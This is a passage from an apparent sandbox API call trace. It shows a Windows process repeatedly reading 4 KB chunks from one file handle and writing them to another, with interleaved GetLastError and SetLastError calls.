lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.297] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.297] GetLastError () returned 0x0 [0080.297] SetLastError (dwErrCode=0x0) [0080.297] GetLastError () returned 0x0 [0080.297] SetLastError (dwErrCode=0x0) [0080.297] GetLastError () returned 0x0 [0080.297] SetLastError (dwErrCode=0x0) [0080.298] GetLastError () returned 0x0 [0080.298] SetLastError (dwErrCode=0x0) [0080.298] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.298] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.298] GetLastError () returned 0x0 [0080.298] SetLastError (dwErrCode=0x0) [0080.298] GetLastError () returned 0x0 [0080.298] SetLastError (dwErrCode=0x0) [0080.298] GetLastError () returned 0x0 [0080.298] SetLastError (dwErrCode=0x0) [0080.298] GetLastError () returned 0x0 [0080.298] SetLastError (dwErrCode=0x0) [0080.299] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.299] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.299] GetLastError () returned 0x0 [0080.299] SetLastError (dwErrCode=0x0) [0080.299] GetLastError () returned 0x0 [0080.299] SetLastError (dwErrCode=0x0) [0080.299] GetLastError () returned 0x0 [0080.299] SetLastError (dwErrCode=0x0) [0080.299] GetLastError () returned 0x0 [0080.299] SetLastError (dwErrCode=0x0) [0080.299] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.300] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.300] GetLastError () returned 0x0 [0080.300] SetLastError (dwErrCode=0x0) [0080.300] GetLastError () returned 0x0 [0080.300] SetLastError (dwErrCode=0x0) [0080.300] GetLastError () returned 0x0 [0080.300] SetLastError (dwErrCode=0x0) [0080.300] GetLastError () returned 0x0 [0080.300] SetLastError (dwErrCode=0x0) [0080.300] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.301] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.301] GetLastError () returned 0x0 [0080.301] SetLastError (dwErrCode=0x0) [0080.301] GetLastError () returned 0x0 [0080.301] SetLastError (dwErrCode=0x0) [0080.301] GetLastError () returned 0x0 [0080.301] SetLastError (dwErrCode=0x0) [0080.301] GetLastError () returned 0x0 [0080.301] SetLastError (dwErrCode=0x0) [0080.301] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.301] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.302] GetLastError () returned 0x0 [0080.302] SetLastError (dwErrCode=0x0) [0080.302] GetLastError () returned 0x0 [0080.302] SetLastError (dwErrCode=0x0) [0080.302] GetLastError () returned 0x0 [0080.302] SetLastError (dwErrCode=0x0) [0080.302] GetLastError () returned 0x0 [0080.302] SetLastError (dwErrCode=0x0) [0080.302] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.302] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.303] GetLastError () returned 0x0 [0080.303] SetLastError (dwErrCode=0x0) [0080.303] GetLastError () returned 0x0 [0080.303] SetLastError (dwErrCode=0x0) [0080.303] GetLastError () returned 0x0 [0080.303] SetLastError (dwErrCode=0x0) [0080.303] GetLastError () returned 0x0 [0080.303] SetLastError (dwErrCode=0x0) [0080.303] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.478] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.487] GetLastError () returned 0x0 [0080.487] SetLastError (dwErrCode=0x0) [0080.487] GetLastError () returned 0x0 [0080.487] SetLastError (dwErrCode=0x0) [0080.488] GetLastError () returned 0x0 [0080.488] SetLastError (dwErrCode=0x0) [0080.489] GetLastError () returned 0x0 [0080.489] SetLastError (dwErrCode=0x0) [0080.490] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.490] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.492] GetLastError () returned 0x0 [0080.492] SetLastError (dwErrCode=0x0) [0080.494] GetLastError () returned 0x0 [0080.494] SetLastError (dwErrCode=0x0) [0080.494] GetLastError () returned 0x0 [0080.494] SetLastError (dwErrCode=0x0) [0080.494] GetLastError () returned 0x0 [0080.501] SetLastError (dwErrCode=0x0) [0080.501] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.501] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.501] GetLastError () returned 0x0 [0080.501] SetLastError (dwErrCode=0x0) [0080.502] GetLastError () returned 0x0 [0080.502] SetLastError (dwErrCode=0x0) [0080.502] GetLastError () returned 0x0 [0080.502] SetLastError (dwErrCode=0x0) [0080.502] GetLastError () returned 0x0 [0080.502] SetLastError (dwErrCode=0x0) [0080.502] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.502] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.502] GetLastError () returned 0x0 [0080.502] SetLastError (dwErrCode=0x0) [0080.502] GetLastError () returned 0x0 [0080.502] SetLastError (dwErrCode=0x0) [0080.503] GetLastError () returned 0x0 [0080.503] SetLastError (dwErrCode=0x0) [0080.503] GetLastError () returned 0x0 [0080.503] SetLastError (dwErrCode=0x0) [0080.503] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.503] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.503] GetLastError () returned 0x0 [0080.503] SetLastError (dwErrCode=0x0) [0080.503] GetLastError () returned 0x0 [0080.503] SetLastError (dwErrCode=0x0) [0080.503] GetLastError () returned 0x0 [0080.503] SetLastError (dwErrCode=0x0) [0080.504] GetLastError () returned 0x0 [0080.504] SetLastError (dwErrCode=0x0) [0080.504] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.504] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.504] GetLastError () returned 0x0 [0080.504] SetLastError (dwErrCode=0x0) [0080.504] GetLastError () returned 0x0 [0080.504] SetLastError (dwErrCode=0x0) [0080.504] GetLastError () returned 0x0 [0080.504] SetLastError (dwErrCode=0x0) [0080.504] GetLastError () returned 0x0 [0080.504] SetLastError (dwErrCode=0x0) [0080.504] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.505] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.505] GetLastError () returned 0x0 [0080.505] SetLastError (dwErrCode=0x0) [0080.505] GetLastError () returned 0x0 [0080.505] SetLastError (dwErrCode=0x0) [0080.505] GetLastError () returned 0x0 [0080.505] SetLastError (dwErrCode=0x0) [0080.505] GetLastError () returned 0x0 [0080.505] SetLastError (dwErrCode=0x0) [0080.505] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.506] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.506] GetLastError () returned 0x0 [0080.506] SetLastError (dwErrCode=0x0) [0080.506] GetLastError () returned 0x0 [0080.506] SetLastError (dwErrCode=0x0) [0080.506] GetLastError () returned 0x0 [0080.506] SetLastError (dwErrCode=0x0) [0080.506] GetLastError () returned 0x0 [0080.506] SetLastError (dwErrCode=0x0) [0080.506] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.506] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.507] GetLastError () returned 0x0 [0080.507] SetLastError (dwErrCode=0x0) [0080.507] GetLastError () returned 0x0 [0080.507] SetLastError (dwErrCode=0x0) [0080.507] GetLastError () returned 0x0 [0080.507] SetLastError (dwErrCode=0x0) [0080.507] GetLastError () returned 0x0 [0080.507] SetLastError (dwErrCode=0x0) [0080.507] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.507] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.507] GetLastError () returned 0x0 [0080.507] SetLastError (dwErrCode=0x0) [0080.508] GetLastError () returned 0x0 [0080.508] SetLastError (dwErrCode=0x0) [0080.508] GetLastError () returned 0x0 [0080.508] SetLastError (dwErrCode=0x0) [0080.508] GetLastError () returned 0x0 [0080.508] SetLastError (dwErrCode=0x0) [0080.508] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.508] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.508] GetLastError () returned 0x0 [0080.508] SetLastError (dwErrCode=0x0) [0080.508] GetLastError () returned 0x0 [0080.508] SetLastError (dwErrCode=0x0) [0080.509] GetLastError () returned 0x0 [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.509] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.509] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.509] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.509] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.509] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.510] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.510] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] SetLastError (dwErrCode=0x0) [0080.510] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.510] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.511] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.511] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.511] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] SetLastError (dwErrCode=0x0) [0080.512] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.513] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.513] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] SetLastError (dwErrCode=0x0) [0080.513] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.513] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.514] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.514] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.514] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.514] SetLastError (dwErrCode=0x0) [0080.514] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.515] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.515] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] SetLastError (dwErrCode=0x0) [0080.515] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.515] WriteFile (in: hFile=0x42c, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] SetLastError (dwErrCode=0x0) [0080.516] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, 